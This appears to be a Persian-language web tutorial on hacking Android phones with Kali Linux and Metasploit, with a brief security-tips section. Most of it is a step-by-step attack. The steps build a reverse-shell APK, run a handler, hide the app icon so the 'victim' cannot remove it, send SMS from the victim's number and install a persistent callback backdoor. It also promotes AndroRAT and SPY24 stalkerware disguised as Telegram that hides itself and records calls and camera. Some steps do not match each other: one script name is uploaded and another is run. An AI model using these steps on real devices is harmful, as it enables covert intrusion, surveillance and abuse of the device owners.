هک اندروید با استفاده از کالی و آموزش جامع و راه و روش های امنیت

هک اندروید با استفاده از کالی و آموزش جامع و راه و روش های امنیت
Content List
هک اندروید با استفاده از کالی لینوکس و راه و روش های امنیت در‌این اموزش به شیوه هک اندروید با به کارگیری از کالی لینوکس می‌پردازیم و شیوه های امنیت در مقابل این شیوه را اموزش می‌دهیم در‌این اموزش هک و امنیت با ما همراه باشید.

هک اندروید و امنیت توضیحات در رابطه هک اندروید

سیستم عامل اندروید یک کدام از OS های محبوب در مجموع جهان میباشد که روزانه افراد بسیاری از ان استفاده می نمایند

این OS برای دستگاه های تلفن همراه طراحی شده‌است البته قابلیت و امکان نصب ان در هر سیستمی موجود است

به همین دلیل محبوبیت بخش اعظمی دارد و افراد زیادی در کشور‌ایران و عالم از ان استفاده می‌کنند

درین اموزش با شیوه های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خوا هیم کرد.

هک اندروید با استفاده از کالی و آموزش جامع و راه و روش های امنیت


هک اندروید با ارسال عکس

هک اندروید با استفاده از کالی لینوکس و راه و روش های امنیت

آموزش هک اندروید با کالی لینوکس متاسپلویت

متاسپلویت یک فریمورک قدرتمند تست نفوذ میباشد که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما دوستان ارائه دادیم ؛ البته به طور خلاصه ابزاری میباشد که در هر سیستم عاملی از جمله ویندوز قابل نصب میباشد و به طور پیشفرض در کالی لینوکس موجود است،

و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود میباشد

و ما در‌این اموزش با استفاده از یکی‌از پیلود های ان یک فایل برای تست امنیت یا این که هک اندروید خوا هیم ساخت و ان را اجرا می کنیم.

چگونگی ردیابی مخفیانه و هک گوشی های آیفون از راه دور

اموزش ویدئو ای هک اندروید و امنیت

اموزش تست نفوذ اندروید

در ابتدا با دستور زیر وارد متاسپلویت گردید

msfconsole

پس از کمی انتظار و باز شدن متا دستور پایین را برای تنظیم و ساخت apk وارد نمایید

use android/meterpreter/reverse_tcp

هم اکنون تنظیمات مرتبط با این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد فرمایید، توجه داشته باشید در‌این بخش باید ای پی سرور خود را وارد نمائید در صورتی که از سرور استفاده نمی‌کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده‌است.

set LHOST 127.0.0.1

و یک پورت را برای اتصال تعیین فرمائید مثلا ما پورت ۶۰۶۰ را به کارگیری می‌کنیم

set LPORT 6060

درحال حاضر برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد نمائید

generate -f raw -o PentestCore.apk

دستور پایین را برای ایجاد اتصال بین پیلود وارد نمایید

use multi/handler

و پیلود ساخته شده را ست فرمایید ادرس پیلود در واقع ادرسی میباشد که در دستور اول وارد کرده ایم

set PAYLOAD android/meterpreter/reverse_tcp

دوباره تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد

و در اخر برای اجرای کافیست دستور exploit را وارد فرمایید و تا نصب اپ اندروید تشکیل‌شده منتظر بمانید

پس از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد

و می‌توانید دستورات خود را در سیستم عامل اندروید قربانی اجرا فرمائید یا این که از امکانات متاسپلویت برای ان استفاده نمایید.

درصورتی که که اندروید هدف روت گردیده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و داده ها حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

شیوه استفاده از meterpreter بعداز نفوذ

استفاده از ۳ دستور پر استفاده پس از گرفتن دسترسی از قربانی :

امنیت اندروید خود را به صورت دقیق برسی نمائید

دستورات بسیار زیادی بعداز دسترسی گرفتن از اندروید قربانی پیش روی شماست که می‌توانید با استفاده از دستور help تمام دستورات را ببینید و از آن‌ها استفاده نمائید، ولی درین قسمت از آموزش قصد داریم شما‌را با ۳ دستور مهم و کاربردی آشنا کنیم .

دستور اولیه : hide_app_icon

با استفاده از این دستور می‌توانید آیکن فایل مخرب خود را مخفی فرمایید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.

دستور دوم : check_root

با استفاده از دستور بالا میتوانید ورژن سیستم عامل اندروید هک گردیده خود را بررسی نمائید که ایا روت میباشد یا این که نه؟

تا اگر روت میباشد با استفاده از بکدوری که در ادامه انرا به شما معرفی خوا‌هیم کرد دسترسی خود دائمی فرمایید.

دستور سوم : send_sms -d number -t ” body text sms ”

دستور بالا دستور بسیار جذابی میباشد که میتوانید با استفاده از این دستور

با شماره قربانی یک sms به شماره مورد نظر خود ارسال فرمائید.

نکته : در قسمت number می بایست شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد نمایید و در قسمت text بایستی متن دلخواه خود را وارد فرمائید و سپس بر روی enter کلیک نمائید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.

ساخت بکدور بر روی اندروید قربانی

در ابتدا بایستی با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را بررسی نمایید و در حالتی که اندروید تارگت شما روت بود میتوانید با ایجاد یک بکدور دسترسی خود را دائمی نمائید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :

/ cd

سپس درین مرحله می بایست با استفاده از دستور پایین به مسیر sdcard وارد گردید :

cd /sdcard

سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود فرمائید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت مو جود که با زبان bash درج شده میباشد را بر روی اندروید قربانی خود اپلود نمایید.

upload /root/Desktop/backdoor.sh /sdcard

توجه فرمایید که بایستی مسیر اسکریپت را به درستی وارد فرمایید تا عملیات اپلود به خوبی انجام شود.

بررسی اکانت های توییتر

در مرحله بعدی بایستی با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .

سپس مجددا دو دستور زیر را وارد نمایید تا به محلی که در آن اسکریپت را آپلود نموده اید برسید :

/ cd

cd /sdcard

در‌این قسمت بایستی با استفاده از دستور پایین اسکریپت را برای اجرا بکدور بعداز هک اندروید وارد نمائید :

sh lifetime.sh

در نهایت بایستی با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot نمایید ، سپس هنگامی که اندروید قربانی شما مجددا راه اندازی شما هر ۲۰ ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می‌نماید که می‌توانید از اکسپلویت مولتی هندلر استفاده نمایید و به دستگاه اندروید مورد نظر خود متصل گردید.

اموزش ویدئو ای هک اندروید و امنیت

هک اندروید با لینک

آموزش امنیت و جلوگیری از هک اندروید

برای امنیت در اندروید شیوه های بسیاری موجود هست که موردها زیر برخی از مهمترین ان ها می باشند :

از انتی ویروس های اورجینال اندرویدی استفاده کنید

از نصب برنامه های نامعتبر و کرک گردیده خود داری فرمایید

با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.

از دریافت برنامه به غیر از پلی استور خود داری نمایید

بر روی هر ینکی کلیک نکنید و وارد وب سایت های نامعتبر نشوید

از انتی ویروس های فعال استفاده فرمایید که با نصب هر برنامه ان را اسکن نماید

دیتا های اصلی خود را در گوشی نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید

پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی گوشی مورد نفوذ قرار نگیرد

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

دانلود کلیپ اموزشی هک اندروید با کالی

امید‌وار‌یم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا این که پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال نمایید و در کوتا ترین زمان جواب داده خواهد شد پایدار باشید.

متاسفانه از آنجایی که اندروید یک سیستم عامل متن باز است، امکان هک و نفوذ به آن نیز زیاد میباشد. این سیستم عامل به جهت متن باز بودن امکانات کاملی را برای توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد. سیستم عامل های متن باز معمولا دسترسی های بیشتری را برای کاربرانشان به وجود می آورند به همین دلیل بیش تر در معرض هک اندروید قرار میگیرد. سیستم عامل اندروید نیز در خطر انواع بدافزارها، ویروس ها و برنامه های هک برای آن نوشته شده میباشد.

امروز قصد داریم نکاتی را درباره‌ی شیوه های هک اندروید و راه های نفوذ به‌این سیستم عامل را بررسی کرده و در اختیار دوست داران قرار دهیم.

هک اندروید به چه شکل امکان پذیر میباشد ؟

در همین در آغاز، بدون اینکه بخواهیم شما‌را گیج کنیم، بایستی بگوییم تمام دستگاهای الکترونیکی قابل هک شدن می‌باشند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند. شیوه های هک موبایل اندروید بسیار متنوع و زیاد میباشد تا جایی که حتی افرادی که دانش چندانی در مورد برنامه نویسی و هک ندارند، باز هم می‌توانند موبایل های اندروید را با چند راهکار ساده هک نمایند. این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت و امکان هک شدن را دارند ولی شیوه های هک آن مختلف بوده و هر کس با توجه به توانایی های خود می‌تواند یک روش خاص را انتخاب کند. هر روشی نیز به ابزاری خاص نیازمند میباشد، که‌این ابزارها میزان دسترسی و کیفیت هک شما‌را مشخص مینمایند.

شاخص ترین شیوه و ابزاری که یک هکر قادر است برای انجام هک اندروید از آن استفاده نماید، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس میباشد که از ورژن کالی لینوکس یا این که بکترک استفاده نماید. خبر بد برای دارندگان موبایل های اندروید این میباشد که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده‌است و همین عامل سبب می‌گردد پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت بپذیرد.

هک اندروید با ip

هک اندروید با روشهای گوناگون لینوکس

برای اینکه بتوان اقدام به هک اندروید کرد باید ورژن کالی لینوکس را روی سیستم خود داشته باشید. بعد از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می‌نماید. با استفاده از این ابزار، هکر اقدام به ایجاد یک برنامه هک اندروید به صورت APK می‌نماید. برای ساخت چنین ابزاری هکر فقط نیاز دارد که دستور پایین را در محیط ترمینال لینوکس وارد کند.

فرمان فوق هکر به جای عبارت LHOST می تواند از نشانی آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده نماید. Name.apk اسم ابزاری میباشد که هکر آن را می سازد تا با آن اقدام به هک اندروید کند.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

Msf>use exploit/multi/handler

Msf>set PAYLOAD android/meterpreter/reverse_tcp

Msf>set LHOST 192.168.1.35

Msf>set LPORT 443

اما این توشه در قسمت LHOST نیاز میباشد که آدرس سرور را وارد نماید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام می‌شود و شما به خواسته خود رسیده اید.

هم اکنون هنگامی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک نماید و آن را اجرا نماید، عملیات هک با کالی لینوکس برد آمیز انجام می گردد. همانگونه که میبینید در‌این شیوه هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورها هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید کند.

آموزش جامع خواندن پیام واتساپ دیگران هک واتساپ از راه دور

هک اندروید با برنامه های هک

همانطور که گفتیم ابزارهایی که برای هک استفاده میکنید میزان دسترسی و کیفیت عمل هک را تعیین می‌کند. یکی از دیگر از ابزارهایی که بسیار مورد استفاده هکرها به خصوص هکرهایی با سواد کمتر در این مورد قرار می‌گیرد، نرم افزارهای هک و نفوذ به اندروید می‌باشد.

این برنامه ها معمولا توسط هکرهای حرفه ای ساخته میگردند و هکرهای غیرحرفه ای و حتی افراد معمولی نیز از آن ها برای هک موبایل شخص موردنظرشان استفاده می نمایند. تعداد این برنامه ها آنقدر زیاد میباشد که انسان در انتخاب یک کدام از آنها ممکن میباشد حتی گیج شود. اما این اپلیکیشن ها برای اجرا و درست کار کردن نیازمند الزاماتی می‌باشند که برخی به سادگی در اختیار همه قرار نمی گیرند. در پی مقاله تعدای از نرم افزارهای هک را به اجمال معرفی خوا‌هیم نمود.

هک اندروید با برنامه AndroRAT

یک کدام از برنامه های معروف و پرطرفدار در این مورد که تاکنون بسیار موفق عمل کرده است ، برنامه AndroRAT است. اسم این اپلیکیشن مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی می‌باشد. این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته میباشد و قابلیت و امکان هک گوشی از راه دور را نیز به آنان می‌دهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms بوسیله موبایل قربانی نمود. یکی‌از ویژگی هایی که باعث محبوبیت این برنامه شده‌است، امکان تصویر برداری با استفاده از دوربین موبایل هدف میباشد.

اپلیکیشن هک اندروید zANTI

بسیاری از اپلیکیشن ها می باشند که به نرم افزارهای هک معروفند ولی با هدف انجام تست نفوذ به سیستم طراحی و عرضه می گردند. اپلیکیشن zanty نیز یکی این نرم افزارهاست که به کارشناسان امنیت شبکه کمک می‌نماید در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه کنند. این برنامه هک اندروید به برنامه Backtrack تلفن همراه معروف هست، چرا‌که همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای انجام عمل هک قرار می‌دهد و از طرفی قدرت فوق العاده ای نیز دارد.

برنامه کنترل SPY24

SPY24 یکی‌از دیگر از برنامه هایی میباشد که می‌تواند کار کنترل و هک گوشی شخص موردنظر شما‌را انجام دهد. این برنامه با انگیزه نظارت بر فرزندان در فضای مجازی به وسیله سامانه کنترل فرزند طراحی و نوشته شده میباشد.

SPY24 در دو ورژن بدون دسترسی ( هک با شماره تلفن ) و با دسترسی ارائه می‌شود. که ولی ورژن جدید این برنامه نیز با اسم SPY24 منتشر گردیده که شما می‌توانید آن را با آیکون دلخواهتان برای مثال تلگرام بدون فیلترشکن برای فرزندتان ارسال نمایید، به محض کلیک فرزند برروی لینک و پیوند ارسالی شما، برنامه به طور اتوماتیک نصب می‌شود و سپس از لیست نرم افزارها پنهان می گردد. قابلیت و امکان های منحصر به فردی که‌این نسخه ارائه داده میباشد، شنود و ضبط مکالمات فرزند و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند است.

برای دانلود و یا این که کسب اطلاعات بیشتر درباره این برنامه میتوانید برروی لینک و پیوند قرمز رنگ پایین کلیک فرمایید.

هک با شماره گوشی با اپلیکیشن SPY24